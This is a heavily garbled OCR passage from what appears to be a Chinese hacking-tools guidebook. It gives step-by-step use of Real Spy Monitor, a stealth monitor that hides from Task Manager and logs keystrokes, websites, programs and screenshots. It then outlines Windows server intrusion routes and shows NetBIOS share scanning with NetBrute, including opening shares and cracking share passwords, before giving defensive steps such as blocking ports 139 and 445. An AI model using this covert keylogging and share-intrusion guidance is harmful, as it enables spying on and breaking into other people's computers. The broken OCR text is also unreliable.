2. 设置 弹出 热 键 

之 所 以 需要 设置 弹出 热 键 , 是 因为 Real Spy Monitor 在 运行 时 会 比较 彻底 地 将 自己 隐藏 ， 
用 户 在 “任务 管理 器 ”等 处 看 不 到 该 程序 的 运行 。 要 将 运行 时 的 Real Spy Monitor 调 出 束 要 
使 用 热 键 ， 人 否则 即使 单 击 “开始 ” 某 单 中 的 “Real Spy Monitor” 命 令 也 不 会 将 其 调 出 。 

设置 热 键 的 具体 操作 步骤 如 下 。 


STEP01: 返回 “Real Spy Monitor” 主 窗口 STEP02: 设置 热 键 


SS 


» RealSpy Monitor Bulid 2.93 
Powerful PC Spy-Monifkoring-Security Software Monitoring Status: Not Actve 


General Setting 
HotKey Configuration: 


General Setting 号 Keystrokes Typed MSN Messenger 一 
纺 鼻 /Startup Settings 0 Keystrokes Logged WB 0 conversations Start Monitor Logging Record Select your hotkey patten: 


Options PC Activity Internet Eutions 


Logging Recorded 六 Websites Visited ICQ Messenger 《si Monitor) 
Configure logging options 0 Websites Logged 0 Conversations Email Delivery 


Cpcactivity ) 
Email \ FTP Delivery Windows Viewed AOL Messenger 
Set Email \ FTP Delvery 0 Windows Logged 0 Conversations 《 Messeager -a Snapshots Spy 


4 | Screen Spy -ey Programs Executed Yahoo! Messenger SR - 
动 Record snapshots activity 3 Web Mail Hotkey Choice 


0 Application Logged 0 Conversations 
Hotkey Choice 2 Screen Snapshots Hictnail gg Content Filtering 局 Ctrl+Alt+Z ™ psq "Start Monitor 
Set your own hotkey 0 Snapshots Logged 人 -一 € Re ) Button.( If Real Spy Monitor ts started 训 Stealth Mode) 


Content Filtering Files\Docs Accessed Ew FTP Delivery 
和 Filtter User's Activitys 0 Fies Logged YaHoo! Mail % 了 elp 
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单 击 “Hotkey Choice” 图 标 。 在 “Select your hotkey patten” 下 拉 列 表 框 中 选择 
所 需 热 键 ( 也 可 自 定义 )。 


oo 


工具 全 攻略 


今 公 公公 
监控 浏览 过 的 网 站 
ws 了 最 基本 的 设置 后 , 就 可 以 使 用 Real Spy Monitor 进行 系统 监控 了 .下面 讲述 Real 
Spy Monitor 如 何 对 一 些 最 常用 的 程序 进行 监控 。 监 探 浏览 过 的 网 站 的 具体 操作 步骤 如 下 。 


STEP01: 单 击 “Start Monitor” 按 钮 STEP02: 查看 “注意 ”信息 


Am Real Spy Monitor Bulid 2.93 
Pe Powerful PC Spy-Monitoring-Securty Software Monitoring Status: Not Actve 


Options Buttions 


ee ee ; Email 
加 mr， 让 Ce Real Spy Monitor s now going to be in 

os ham peti 让 | i stealth mode.To bring Real Spy Monitor 

eral\rpoewey 。 国 ， out of steal mode,press Ctrl+Akt+5 on 


stealth Mode Notice: 


Set Email \ FTP Delvery 


YOUT keyboard. 


r Screen Spy = pt - 9 
击 Record snapshots actvity 3 0 Application Logged Ww) 0 Conversations 
Do not show me this message again. 


总 Hotkey Choice B23 Screen Snapshots 
Set your own hotkey 0 Snapshots Logged 


Content Filtering Files\Docs Accessed i- 
他 Fiter User's Activitys 区 0 Fles Logged 了 AHOOL Mail x Help 
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弹出 对 话 框 ， 输 入 正确 的 密码 ， 单 击 “OK” 按 钮 。 在 认真 阅读 注意 信息 后 ， 单 击 “OK ”按钮 。 
STEP03: 使 用 IE 浏览 器 浏览 网 站 


Real Spy Monitor Bulid 2.93 
Powerful PC Spy-Monitoring-Security Software Monitoring Status: Not Active 


人 ES i 二 
Se Settngy 国 Fesveeoe。 注 ro GO 按 <Ctrl+Alt+R> 组 合 键 ， 在 密码 输入 对 话 框 中 输入 

旱 | 区 ee = 所 设置 的 密码 ， 调 出 “Real Spy Monitor” 主 窗口 ， 

EE ee ee Cu 可 以 发 现 其 中 的 “Websites Visited” 项 下 已 有 了 

We 计数 。 

入 me 加 SR CE | 此 处 计数 的 数字 为 37， 表 示 共 打开 了 37 个 网 页 ， 
和 2 | YAHOO! Malt( | Cap 然后 单 击 “Websites Visited” 选 项 。 


| 
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STEP04: 打开 “Report” 窗 口 


Repert © e@e 


Select what you want to view: 


= 4 号 SS | [六 mer 3 Programs 加 ww > ps 


be 二 on | net RE 一 一 一 
Execute 本 下 PRE 的 2009-6-12 9:00:5 


Re re Da 有 Ftp pe Pi Ee ri 20096 12 9:01; 02 
和 ) | 百度 一 下 ,你 就 知道 - Microsoft Int.,， http:jfwww.baidu.c.., Adminis.,。 2009-6-12 9:01:04 
百度 搜索 _| 新 浪 - Microsoft Internet,,，http:ffvwww,baidu,c,,, adminis,,， 2009-6-12 9:01;24 

Find 新 浪 首页 - Microsoft Internet Explorer http://wwwsina.co... Adminis.,. 2009-6-12 9:01:43 
明星 全 接触 _ 影 音 娱 乐 _ 新 浪 网 - Micr.,， http:jjent,sina.com,.,， Adminis,,. 2009-6-12 9:02:01 

张 诅 予 苏有朋 抵制 人 口 赂 志 为 动画 专 ,， http:/fent,sina,com,,,, Adminis,,, 2009-6-12 9:03;12 
明星 全 接触 _ 影 音 娱 乐 _ 新 浪 网 - Micr..， http:jjent,sina.com..,,， Adminis,.， 2009-6-12 9:03:21 

Delete http:f/video.sina.com.cnfent/s/h/2.. ,» http://video,.sina.co... Adminis... 2009-6-12 9:03:41 
明星 全 接触 _ 影 音 娱 乐 _ 新 浪 网 - Micr,,， http:Went,sina,com,…， adminis,,， 2009-6-12 9:03:43 


可 看 到 列表 里 的 37 个 网 址 。 这 显然 就 是 Real Spy 
Monitor 刚刚 监控 到 的 使 用 IE 浏览 颖 打开 的 网 页 


腾讯 首页 - Microsoft Internet Explorer http:/jwwwqg.com} Adminis,,, 2009-6-12 9:03;54 
@ httn:finn.awsns.rAnm! - Mirrnanft 1..， httn: finn.Rawsns.ram! Adminis... 2nng-f-12 9:n4:21 兰 
Reset 
Output 
Select item and press "Execute" te visit websites,. @ Set Listhox font Color Set Texthox font Color 


今 如 果 想 要 深入 查看 相应 网 页 是 什么 内 容 ， 只 需要 双击 列表 中 的 网 址 ， 即 可 
提示 ”自动 打开 了 浏览 器 访问 相应 的 网 页 


2 


扫描 与 陨 探 工具 


4. 键盘 输入 内 容 监控 
对 键盘 输入 的 内 容 进行 监控 通常 是 木马 做 的 事 ， 但 Real Spy Monitor 为 了 让 目 身 的 监控 
功能 变 得 更 加 强大 也 提供 了 此 功能 。 其 针对 键盘 得 入 内 容 进 行 监控 的 具体 操作 步骤 如 下 。 


STEP01: 使 用 键盘 输入 一 些 信息 


局 一 一 一 -一 ”一 一 一 一 三 
Real Spy Monitor Bulid 2.93 
Powerful PC Spy-Monitoring-Security Software Monitoring Status: Not Active 


Op tions PC Activi a i 按 下 所 设 的 <GtrlieAltseR > 2 在 密码 输入 对 
ee | 话 框 中 输入 所 设置 的 密码 ， 调 出 “Real Spy Monitor 


人 ome | 主 窗口 ， 此 时 可 以 发 现 Keystrokes Typed 项 下 已 
有 了 计数 。 

sn, ,Mo Beeted 7 Yahoo! Hessenoer CHE) 可 以 看 出 计数 的 数字 为 23， 表 示 有 23 条 记录 ， 然 
Set your own hotkey 14 Snapshots Logged 


Content Filtering Files\Docs Accessed YixHoo! NEw — 
4 KB) Fiter User's Activitys 26 Files Logged Mail x Help 
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Ho Choice Se Screen Snal ts 人 se ) = ” 下 
tkey nc CTIDEDP 后 单 击 “Keystrokes Typed ”选项 。 


STEP02: 查看 记录 信息 STEP03: 打开 记事 本 窗口 


: - 一 习 temp.txt - 记事 本 
elect What you Want to view: 
4 ge 要 吕 加 品 we 请 |ssonit 局 文件 旧 编辑 (E) 格式 (O) 坦 看 (V) 帮助 (H) 


Erearts [Sd /1 1022 mm 微 淘宝 搜索 : 
- Mi.. Adminstrator 2013/11/1 16:23.. | #J] relative#J relative#] relative 一 
dmini J 图 -= 
An 2013/11/1 1624-~ | Windows Internet Fxplorer 


G 
Find .doc - Mi... 作业 | -2 和 m 
-ML Agmmetator 2013/11/1 16226- (Administrator @ 2013/11/1 17:14:06) 
多 与 .doc - Mi.. Administrator 2013/11/1 16:26... 
Program Manager Administrator 2013/11/1 16:27... 
Delete 第 2 篇 扫描 与 皮 扫 撕 技 术 .doc - Mi.. Administrator 2013/11/1 16:27... 
Titleless Windows Administrator 2013/11/1 16:27... 


Program Manager Administrator 2013/11/1 16:27... 
第 ?篇 要 指 与 应 扫 搓 寺 术 .dnc - Mi.. Administrator 2013/11/1 16:28... [Enter] 


Reset 
Qutput 


Press "Find" to search what you're interesting. 全 SetlistboxfontColor SetTextbox font Color 
双击 其 中 任意 一 条 记录 。 可 以 看 出 Administrator 用 户 在 某 点 某 时 某 分 输入 的 
信息 。 


STEP04: 捕获 《Ctrl 》 类 快捷 键 
习 temp+bt -记事 本 站 一 一 一 一 


文件 (日 ”编辑 (E) 格式 (OQO) ” 查 春 (V) 帮助 (H) 

第 2 篇 ”扫描 与 反 扫 擅 技 术 . doc 一 Microsoft 
Word (Administrator @ 2013/11/1 
116:57:55) 


[Ctrl] [Alt] [Alt] [Alt][Alt][Alt] [Alt] a 
| [At] [Alt] [Alt] [Alt] [Alt] [Alt] [Alt] 如 果 用 户 输入 了 < Ctrl > 类 

ATEILIATIELILATIEILATEI LIALTIEI LIAlIt | IAlt = \ S 

[A1t] [A1t] [A1t] [A1t] [A1t] [A1t] [A1t] [A1t] Monitor 同样 可 以 捕获 到 。 


央 捷 键 ， 则 Real Spy 


5. 程序 执行 情况 监控 


如 果 想 知道 用 户 都 在 计算 机 中 运行 哪些 程序 ， 只 需 在 “Real Spy Monitor” 主 窗口 中 单 


03 上 


合 人 他 他 


> 


Py 
全- 工具 全 攻略 


击 “Programs Executed” 图 标 ， 在 弹出 的 “Report” 窗 口中 即 可 看 到 运行 的 程序 名 和 路 径 。 


Select what you Want to view: 


ma 局 Nn 二 wa 


Application Run | _Username | 
C:\Program Files\360\360Safe\safe... Administra... 
C:\Program Files\360\360Safe\safe... Administra... 
C:\Program Fies\360\360Safe\safe... Administra... 
C:\Program Files\360\360Safe\safe... Administra... 
C:\Program Files\360\3605afe\safe..， Administra... 
C:\Windows\system32\SearchFitter... Administra... 
D:\Real Spy Monitor\winrsm.exe Administra... 
D:\Real Spy Monitor\winrsm.exe Administra,.. 
C:\Program Files\5ogouInput\50g0..， Administra... 
C:\Program Files\SogouInput\6.7.0.... Administra... 


Delete 


Start Time 


2013/11/1 16:23... 
2013/11/1 16:23... 


End Time 
2013/11/1 16:23... 
2013/11/1 16:24... 


2013/11/1 16:24... 


2013/11/1 16:24... 
2013/11/1 16:24... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:27... 


2013/11/1 16:24... 
2013/11/1 16:24... 
2013/11/1 16:29... 
2013/11/1 16:27... 


2013/11/1 16:27.… 
2013/11/1 16:28... 
2013/11/1 16:28... 


Programs Executed 的 “Report” 窗 口 


C:\Program Files\SogouInput\6.7.0,... Administra,.. 
D:\Real Snv Monitor\winrsm.exe Ariminicstra. .. 


2013/11/1 16;28,.. 
2013/11/1 16:28... 


Output 


< 


Select item and press "Execute" to start program. 个 Set Listhox font Color Set Textbox font Color 


6. 即时 截图 监控 


用 户 可 以 通过 Real Spy Monitor 的 即时 截图 监控 功能 (默认 为 一 分 钟 截 一 次 图 ) 来 查 


知 用 户 的 操作 历史 。 
即时 截图 监控 的 具体 操作 步 又 如 下 。 


STEP01: 打开 主 窗口 


Real Spy Monitor Bulid 2.93 
Powerful PC Spy-Monitoring-Security Software 


Options PC Activity 


General Setting | 图 Keystrokes Typed 
蛤 Startup Settings 0 Keystrokes Logged 


Monitoring Status: Not Active 
Internet 


MSN Messenger 
0 Conversations 


Buttons 


人 Start Moniton ) 
人 Stop Monitor 
AOL Messenger 

0 Conversations { Messenger 


二 Screen Spy 13 Programs Executed JJ Yahoo! Messenger Web Mail 
Record snapshots actvity 0 Application Logged 局 0 Conversations 


本 detinail gg Fay 
YaHoO! Maile 2 


Websites Visited 
0 Websites Logged 


ICQ Messenger 


i Logging Recorded 
uy 0 Conversations 


Configure logging options 


Nl Email \ FTP Delivery [ Windows Viewed 
Set Email \ FTP Delvery 0 Windows Logged 


Hotkey Choice 
Set your own hotkey 


AR | Screen Snapshots 
0 Snapshots Logged 


Content Filtering 
可 Fiter User's Activitys 


Files\Docs Accessed 
0 Files |ogged 
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单 击 “Screen Snapshots” 选 项 。 


STEP03: 以 Windows 图 片 和 传真 查看 器 


N 


显然 ，Real Spy Monitor 的 功能 是 极 
会 轻松 很 多 。 


STEP02: 查看 记录 的 操作 


Select what you want to view: 


党 ua 泡 , 吕 二 we 3 pal ~ 艾 | 
Ds Time 


Windows Title Usemame | Time 
第 2 篇 扫描 与 友 扫 描 技 术 .d.., Administrator 2013/11/1 16:26... 
a Program Manager Administrator 2013/11/1 16:27... 
全) program Manager Administrator 2013/11/1 16:28... 
Tileless Windows 


Administrator 2013/11/1 16:29... 
Fnd 第 2 篇 扫 措 与 反 扫 描 技术 .4... Administrator 2013/11/1 16:30... 
道 搜 索 _Real Spy M..。 


百 Administrator 2013/11/1 16:31... 
第 2 喜 扫 指 与 反 扫 据 技 术 .4.。Administrator 2013/11/1 16:32.… 
Delete [| Ee 


Administrato 0 6 
Admmnistrator | 2013/11/1 17:02... 

玉芝 姐 姐 万 圣 节 化 身 僵尸 新 ,.. Adrhinistrator 2013/11/1 17:03... 

wy 网 易 - Windows Internet ... Adrhnistrator 2013/11/1 17:04... 


a 


Execute 


Reset “新浪 首页 - Windows Intemet Explbrer 
Administrator 
2013/11/1 17:02:51 


Qutput 


* 


Double Click item to View Snapshots 使 Set Listbox font Color Set Textbox font Color 


可 看 到 Real Spy Monitor 记 录 的 操作 ， 双 击 其 中 任 
意 一 项 查看 截图 记录 。 


查看 


可 以 看 到 所 截 的 图 。 


强大 的 ， 使 用 它 对 系统 进行 监控 ， 网 络 管理 员 将 


EEC 


随 着 Windows 的 广泛 使 用 ， 其 不 断 有 新 的 漏洞 被 用 户 发 现 ， 和 微软 也 不 断 推 
出 新 的 修补 程序 和 安全 加 密 程序 。 但 作为 用 户 未 必 知 道 所 有 的 系统 漏洞 该 如 何 
修补 ， 这 给 予 了 黑客 可 乘 之 机 。 


O 入 侵 Windows 服务 器 的 流程 曝光 
O 〇 NetBIOS 漏洞 攻防 
O DcomRpec 溢出 工具 


〇 使 用 MBSA 检测 系统 漏洞 


O Windows Update 修复 系统 漏洞 


客 过 
区 -工具 人 攻 了 


3.1 Windows 服务 器 系统 入 侵 曝 光 


Windows 服务 器 系统 包括 一 个 全 面 、 集 成 的 基础 结构 ， 旨 在 满足 开发 人 员 和 信息 技术 
GT) 专业 人 员 的 要 求 。 此 系统 设计 用 于 运行 特定 的 程序 和 解决 方案 ,借助 这 些 程序 和 人 解决 
方案 ， 信 息 工 作 人 员 可 以 快速 便捷 地 获取 、 分 析 和 共享 信息 。 入 侵 者 对 Windows 服务 占 系 
统 的 攻击 主要 是 针对 IIS 服务 堪 和 组 网 协议 的 攻击 。 


3. 上 1 入 侵 Windows 服务 器 的 流程 曝光 


一 般 情 况 下 ， 墨 客 往往 喜欢 通过 下 图 所 示 的 流程 对 Windows 服务 如 进行 攻击 ， 从 而 提 
高 入 侵 服 务 器 的 效率 。 

1) 通过 端口 139 进入 共享 磁 禹 。139 端口 是 
为 NetBIOS 会 话 服 务 (NetBIOS Session Service) = a 二 

. 、 通过 端口 139 进 入 共享 磁盘 

提供 的 ， 主 要 用 于 提供 Windows 文件 和 打印 机 共 
第 被 攻击 者 所 利用 ， 如 使 用 流光 、SuperScan 等 端 < 
工具 可 以 和 六 肝 标 计 关 宙 光 19 关中 。 斩 rr 
果 发 现 有 漏洞 可 以 试图 获取 用 户 名 和 密码 ， 这 是 ET 
非常 危险 的 。 Ei 

2 ) 默认 共享 端口 (IPC$) 入 侵 。IPC$ 是 
Windows 系统 特有 的 一 项 管理 功能 ， 是 微软 公司 Em 
为 方便 用 户 使 用 计算 机 而 设计 的 ， 主 要 用 来 远程 
管理 计算 机 。 但 事实 上 ， 使 用 这 个 功能 最 多 的 人 rum 
不 是 网 络 管理 员 而 是 “入 侵 者 ” 他 们 通过 建立 
IPC$ 连 接 与 远程 主机 实现 通信 和 控制 。 通 过 
IPC$ 连 接 的 建立 ， 入 侵 者 能 够 做 到 建立 、 复 制 、 
删除 远程 计算 机 文件 ， 也 可 以 在 远程 计算 机 上 执 
行 命令 。 

3) IIS 漏 凋 入侵 。JIIS (Internet Information 
Server) 服务 为 Web 服务 器 提供 了 强大 的 Internet 和 Intranet 服务 功能 。 主 要 通过 病 口 80 
来 完成 操作 ， 因 为 作为 Web 服务 器 ，80 端口 总 要 打开 , 所 以 具有 很 大 的 威胁 性 。 长 期 以 来 ， 
攻击 IIS 服务 是 黑客 惯用 的 手段 ， 这 种 情况 多 是 由 于 企业 管理 者 或 网 络 管理 员 对 安全 问题 
关注 不 够 造成 的 。 

4) 绥 冲 区 溢出 攻击 。 绥 冲 区 溢出 是 病毒 编号 者 和 特洛伊 木马 编写 者 人 往 爱 的 一 种 攻击 方 
法 。 攻 击 者 或 病毒 善于 在 系统 当中 发 现 容易 产生 缓冲 区 洪 出 之 处 并 运行 特别 程序 获得 优先 
级 ， 指 示 计 算 机 破坏 文件 、 改 变数 据 、 汇 露 敏感 信息 、 产 生 后 门 访问 点 、 感 染 或 攻击 其 他 
计算 机 等 。 绥 冲 区 溶出 是 目前 导致 “黑客 ”型 病毒 横行 的 主要 原因 。 

$) Serv-U 攻击 。Serv-U FTP Server 是 一 款 在 Windows 平台 下 使 用 非常 广泛 的 FTP 
服务 器 软件 ， 目 前 在 全 世界 广 为 使 用 ， 但 前 不 久 它 的 一 个 叉 一 个 漏洞 被 发 现 ， 许 多 服务 器 


00 
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因此 而 惨遭 黑客 入 侵 。 在 得 到 目标 计算 机 的 信息 之 后 ， 入 侵 者 孢 可 以 使 用 木马 或 黑客 工具 
进行 攻击 了 ， 但 这 种 攻击 必须 绕 过 防火 增 才 可 以 成 功 。 

6) 脚本 攻击 。 脚 本 《〈Script) 是 使 用 一 种 特定 的 描述 性 语言 ， 依 据 一 定格 式 编写 的 可 
执行 文件 ， 又 称 作 宏 或 批 处 理 文件 。 脚 本 通常 可 以 由 应 用 程序 临时 调用 并 执行 。 肢 本 下 
是 因为 这 些 特点 ， 往 往 被 一 些 别 有 用 心 的 人 所 利用 ， 在 脚本 中 加 入 一 些 破 坏 计算 机 系统 
的 命令 。 当 用 户 浏览 网 页 时 ， 一旦 调用 这 类 脚本 便 会 使 用 户 的 系统 受到 攻击 从 而 造成 严 
重 损失 。 

7) DDoS (Distributed Denial of Service， 分 布 式 拒绝 服务 ) 攻击 。 凡 是 能 导致 合法 
用 户 不 能 够 正常 访 问 网 络 服 务 的 行为 部 是 拒绝 服务 攻击 。 也 就 是 说 ,拒绝 服务 攻击 的 目 
的 非常 明确 ， 束 是 要 阻 止 合法 用 户 对 正常 网 络 资源 的 访问 ， 从 而 达成 攻击 者 不 可 告 人 的 
目的 。 

8) 后 门 程序 。 一 般 是 指 那 些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程序 方法 。 
在 软件 的 开发 阶段 , 程序 员 第 第 会 在 软件 内 创建 后 门 程 序 以 便 可 以 修改 程序 设计 中 的 缺陷 。 
但 如 果 这 些 后 门 被 其 他 人 知道 或 在 发 布 软件 之 前 没有 删除 后 门 程序 ， 它 束 成 为 安全 风险 ， 
容易 被 黑客 当成 漏洞 进行 攻击 。 


3.1.2 NetBIOS 漏洞 攻防 


NetBIOS (Network Basic Input Output System， 网 络 基 本 输入 输出 系统 ) 是 一 种 应 
用 程序 接口 (API)， 系 统 可 以 利用 Wins 服务 、 广 播 及 Lmhost 文件 等 多 种 模式 ， 将 
NetBIOS 名 解析 为 相应 的 IP 地 址 ， 实 现 信 息 通 信 。 因 此 ， 在 局 域 网 内 部 使 用 NetBIOS 
协议 可 以 方便 地 实现 消 奶 通信 及 资源 共享 。 因为 它 占 用 系统 资源 少 、 传 输 效 率 高 ， 尤 其 
适 于 由 20 一 200 台 计 算 机 组 成 的 小 型 局 域 网 。 所 以 ， 微 软 的 客户 机 /服务 占 网 络 系统 痢 
是 基于 NetBIOS 的 。 

当 安 装 TCP/IP 协议 时 ，NetBIOS 也 被 Windows 作为 默认 设置 载 入 ， 此 时 计算 机 也 具 
有 了 NetBIOS 本 号 的 开放 性 ，1395 站 口 被 打开 。 某 些 别 有 用 心 的 人 束 利 用 这 个 功能 来 攻击 
服务 器 ， 使 管理 员 不 能 放心 地 使 用 文件 和 打印 机 共享 。 

NetBrute Scanner 可 以 扫描 到 目标 计算 机 上 的 共享 资源 ， 它 主要 包括 如 下 三 部 分 : 

@ NetBrute: 可 用 于 扫 摘 单 台 机 器 或 多 个 IP 地 址 的 Windows 文件 /打印 共享 资源 。 虽 

然 这 已 经 是 众所周知 的 漏洞 ， 但 作为 一 秋 继 续 更 新 中 的 经 典 工 具 ， 对 于 网 络 新 手 以 
及 初级 网 络 管理 员 来 说 仍 是 增强 内 网 安全 性 的 得 力 助 手 。 

@ PortScan: 用 于 扫 摘 目标 机 器 的 可 用 网 络 服 务 ， 帮 助 用 户 确 定 哪些 TCP 端口 应 该 通 
过 防火 墙 设置 屏蔽 挥 ， 或 哪些 服务 并 不 需要 ， 应 该 关闭 。 

@ WebBrute: 可 以 用 来 扫描 网 页 目录 、 检 和 碍 HTTP 身份 认证 的 安全 性 、 测 试用 户 密 
伺 。 这 对 于 站 在 起 步 阶 段 ， 不 至 于 因为 初级 错误 导致 网 站 被 轻 匈 入 侵 的 网 络 管理 
员 来 说 ， 仍 然 非 党 有用。 

下 面 以 使 用 NetBrute Scanner 软件 为 例 来 扫描 计算 机 中 共享 资源 ， 有 具体 操作 步骤 如 下 。 


oe 


Py > 
2 工具 全 攻略 


全 人 人 他 
STEP01: 运行 NetBrute Scanner STEP02: 选择 要 打开 的 文件 


| NetBrute Scanner by Raw Logic Software 


| 赚 打开 

Options Help 

NetBrute | PortScan | webBrule | 
Results : 


二 下 88 Time Dut: TCP Port : 
[aod ht 39 netbios-ssn 


局 Documents 
… 国 E$ 
~… 色 fF$ 


吴 1 (1).png 2011/9/20 0:00 


吴 1 (2)jpg 2010/3/11 14:2; 
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到 | MH | h 
文件 名 mn: [jpe 
文件 类型 好) : v sls 
取消 
a | 


中 


JADMINIETRATOR 4L8QD1ETPGKVSN Re 
设置 扫描 的 IP 地 单 击 。 国 双击 扫描 ”图 选中 要 打开 的 文件 。 单 击 “ 打 开 ” 按 钮 。 


址 沁 围 。 “Scan” ”到 的 计算 机 IP 
按钮 。 地 址 。 


双击 扫描 到 的 共享 文件 夹 ， 如 果 没 有 密码 便 可 直接 打开 。 当 然 ， 也 可 以 在 正 
直接 输入 扫描 到 的 共享 文件 夹 IP 地 址 , 如 “W192.168.1.88”( 或 带 C$、D$ 等 查看 默认 共 
如 果 设 有 共享 密码 ， 则 会 要 求 输入 共享 用 户 名 和 密码 ， We 
软件 (如 Pqwak) 破解 之 后 , 才 可 以 进入 相应 文件 夹 。 如 果 发 现 目 己 的 计算 机 中 有 NetBIOS 
漏 铜 ， 要 想 防 止 入 侵 者 利用 该 漏 铜 进行 攻击 ， 则 需 关 闭 NetBIOS 漏 稠 ， 其 关闭 的 方法 有 很 


多 种 。 
(1) 解 开 文件 和 打印 机 共享 绑 定 
STEP01: 打开 “控制 面板 ”窗口 STEP02: 打开 “网 络 和 共享 中 心 ” 窗 口 


> | 太 用 套 寺 六 和 洁 厨 碑 


ek 坟 RE 寺 WV IRM 才 ah(n) ! 
调整 计算 机 的 设置 寺 才 方式 、 大 图 标 > _ 文 件 ( 申 ”编辑 (FE) 查看 VM) 工具 (T) 帮助 (H) 


3 控制 面板 主页 六 7 
多 东 坊 页 通知 区 域 图 标 查看 基本 网 络 信息 并 设置 连接 
| : i 
的 可 起 共享 中 心 | Js 
4L8QD1ETPGKV.. 
人 他 传感器 加 文件 夹 选 项 
辆 位置 和 其 他 伟 肢 文 4 夹 nl 


天 未 红 局 sa 查看 活动 网 络 
因 | 性 能 信息 和 工具 颜色 管理 


疑难 解答 


在 “控制 面板 窗口 中 单 击 "网 络 和 共享 中 心 " 链接 。 在 窗口 左 侧 单 击 “ 更 改 适 配器 设置 ”链接 。 
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STEP03: ”查看 网 络 连 接 STEP04: 更 改 本 地 连接 属性 


由 本 地 连接 硬性 
入 < 网 络 和 Internet ， 网 络 连 接 = [好 | 大雪 司 8 = ee 
文件 (Pi ”编辑 (E) ”查看 (V) 工具 (T) ”高 级 (N) ”帮助 (H) es 
组 织 Y 禁用 此 网 络 设 备 诊断 这 个 连接 重 命 名 此 连接 


| htheros ARB151 PCI-E Gigabit Ethernet Control] ] 


ee 0): 


筷 ” 禁 用 (B) 
状态 (U) 
诊断 四 


断 开 连接 
WAN Minipor (PPPOE) 


-Internet 协 识 版 
ia -机 路 层 括 扑 发 
辐 -- 链 路 层 拓扑 发 


i 二 ER 、 
全 Ha icrosoft 了 网络 访问 您 的 计 息 机 上 的 


EE 


右 击 “ 本 地 连接 " ， 在 弹出 的 快捷 菜单 中 选择 “ 属 取消 义 选 “Microsoft 网 络 的 单 击 “ 确 
性 ”命令 。 文件 和 打印 机 共享 ” 复 选 框 ， 即 。” 定 "按钮 。 
可 解 开 文件 和 打印 机 共享 绑 定 。 


创建 快捷 方式 (5) 


和 ”删除 (D) 


国生 命名 (M) 


这 样 ， 束 可 以 禁止 所 有 从 139 和 445 剃 口 发 来 的 请 求 ， 别 人 也 了 吏 看 不 到 本 机 的 共享 了 。 
(2) 使 用 IPSec 安全 策略 阻止 对 端口 139 和 445 的 访问 


STEP01: 打开 “控制 面板 ”窗口 STEP02: 查看 各 种 工具 


文件 (F) ”编辑 (E) ”查看 (V) ”工具 (D) ”帮助 (H) 


| 各 次 修改 日 期 


钨 Internet 信息 服务 (11S) 管 理 器 2013/12/16 10:56 
经 电话 和 调制 解 调 器 双 iSCSI 发 起 程序 2009/7/14 12:41 
细 Windows PowerShell Modules 2009/7/14 12:52 
ce 个 性 化 : 国 ] Windows 内 存 诊断 2009/7/14 12:41 


2011/5/26 10:15 


| 2011/5/26 10:15 
A 恢复 及 MsN 上 的 “我 的 网 站 " 。- 2009/7/14 12:41 
疹 高 级 实 全 Windows 防火 培 2009/7/14 12:41 


和 家 长 控制 午 网 络 各 计算 机 管理 2009/7/14 12:41 
曾 4L8QD1ETPGKV51W 全 f 芒 计划 民 序 2009/7/14 12:42 


C5 默认 程序 i 7KG 罩 事件 豆 看 器 2009/7/14 12:42 


省 轻松 访问 中 心 Wl | 已 共享 创建 日 期 : 2011/5/26 10:15 


在 “控制 面板 ”窗口 中 单 击 “管理 工具 ”链接 。 双击 “本 地 安全 策略 ”选项 。 


“人 


ST FP 


工具 全 攻略 


分 公 公公 
STEP03: 创建 “IP 安全 策略 ” 


专 定 | 亢 国 | G 广 | 日 国 | 重 直 
最 安全 设置 | 策略 已 指 


此 视图 中 没有 可 显示 的 项 目 。 
》 国 高 级 安全 Windows 防火 墙 
国 网 络 列表 管理 器 第 略 
> 国 公 届 策略 
》 国 软件 限制 策略 
加 应 用 程序 控制 策略 


(3) 天 闭 Server 服务 


右 击 “IP 安 全 策略 ， 在 本 地 计算 机 ” 子 项 ， 在 弹出 
的 快捷 菜单 中 选择 “创建 IP 安 全 策略 ”命令 。 定 
义 一 条 阻止 任何 IP 地 址 从 139 和 445 端 口 访问 IP 地 址 
的 IPSec 安全 策略 规则 ， 这 样 即使 在 别人 使 用 扫描 
器 扫描 时 , 本 机 的 139 和 445 两 个 端口 也 不 会 给 予 任 
何 回应 。 


这 样 虽 然 不 会 关闭 端口 ， 但 可 以 中 止 本 机 对 其 他 机 占 的 服务 ， 当 然 也 束 中 止 了 对 其 他 
机 融 的 共 孚 。 但 关闭 了 该 服务 将 会 导致 很 多 相关 的 服务 无 法 局 动 ， 如 机 需 中 有 IIS 服务 则 


不 能 采用 这 种 方法 。 
STEP01: 打开 “控制 面板 ”窗口 


一 
〖@@7> 局 》 控制 面板 ”所 有 控制 面板 项 》 bE Dp| 


文件 人” 编 祁 (E) ”查看 (V) 工具 (T) 帮助 (H) 


调整 计算 机 的 设置 


启程 序 和 功能 @ ”电话 和 调制 解 调 器 
售 电 有 剧 个 性 化 

册 以 秘 

让 说 


从 丽人 得 序 
®@ stro 


在 “控制 面板 ”窗口 中 单 击 “管理 工具 ”链接 。 
STEP03: ”关闭 服务 


[Bs 
文件 强 作 (A) ” 章 看 (V) ”帮助 (H) 
和 中 | 国 晶 EBB 


Server 和 名称 “ 撕 述 状态。 局 3 型 。 登录 为 
沁 Secure Socket T.， 提供 .… 手动 本 地 服务 
二 Security Account.， 启 动 .， 已 启动 ”自动 本 了 地 和 至 统 
号 Security Center 。” WSC.。 已 启动 ”自动 耳 迟 .， 本 地 服务 


高 Serv-U File Server 提供 已 尼 动 ”生动 


无 法 启动 。 训 Shall Hardware .。 为 自 .， 已 启动 ”号 动 本 地 系统 
Smart Card 管理 .， 已 启动 ”生动 本 地 服务 
售 Smart Card Rem..， 人 允许 。。 手动 本 地 系统 
SNMP Trap 接收 .… 手动 本 地 服务 
方 Software protect.， 局 用 .… 自动 (是 迟 ..。 网 洛 服务 
误 SPP Notification ..， 提 供 ..。 手动 本 地 服务 
高 Spybot-S&D 2 S.。Offe.。 已 启动 ”号 动 本 地 系统 
篇 Spybot-S&D 2 $.，inte.， 已 启动 ”生动 本 地 系统 
声 Spybot-S&D 2 U..，Dow..。 已 启动 ”号 动 杰 地 系统 
等 SSDP Discovery ” 当 发 .， 已 启动 手动 本 地 服务 
Superfetch 推 护 .，。 已 富 动 ” 写 动 本 地 系统 
SS SwitchBoard 手动 本 地 系统 
已 Symantec PcAny.。 允许 .… 手动 本 地 系统 


S$ syshealth 


